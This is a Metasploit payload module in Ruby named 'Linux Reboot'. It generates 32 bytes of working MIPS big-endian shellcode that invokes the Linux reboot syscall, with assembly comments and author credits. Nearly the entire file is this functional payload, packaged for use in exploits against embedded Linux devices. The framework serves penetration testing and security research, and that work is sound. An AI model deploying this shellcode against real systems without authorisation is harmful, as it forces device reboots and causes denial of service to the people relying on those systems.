1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
module MetasploitModule
7
  CachedSize = 32
8

9
  include Msf::Payload::Single
10

11
  def initialize(info = {})
12
    super(
13
      merge_info(
14
        info,
15
        'Name' => 'Linux Reboot',
16
        'Description' => %q{
17
          A very small shellcode for rebooting the system.
18
          This payload is sometimes helpful for testing purposes or executing
19
          other payloads that rely on initial startup procedures.
20
        },
21
        'Author' => [
22
          'Michael Messner <devnull[at]s3cur1ty.de>', # metasploit payload
23
          'rigan - <imrigan[at]gmail.com>' # original payload
24
        ],
25
        'References' => [
26
          ['URL', 'http://www.shell-storm.org/shellcode/files/shellcode-795.php']
27
        ],
28
        'License' => MSF_LICENSE,
29
        'Platform' => 'linux',
30
        'Arch' => ARCH_MIPSBE,
31
        'Payload' => {
32
          'Offsets' => {},
33
          'Payload' => ''
34
        }
35
      )
36
    )
37
  end
38

39
  def generate(_opts = {})
40
    shellcode =
41
      "\x3c\x06\x43\x21" +  # lui     a2,0x4321
42
      "\x34\xc6\xfe\xdc" +  # ori     a2,a2,0xfedc
43
      "\x3c\x05\x28\x12" +  # lui     a1,0x2812
44
      "\x34\xa5\x19\x69" +  # ori     a1,a1,0x1969
45
      "\x3c\x04\xfe\xe1" +  # lui     a0,0xfee1
46
      "\x34\x84\xde\xad" +  # ori     a0,a0,0xdead
47
      "\x24\x02\x0f\xf8" +  # li      v0,4088
48
      "\x01\x01\x01\x0c"    # syscall 0x40404
49

50
    return super + shellcode
51
  end
52
end
53

54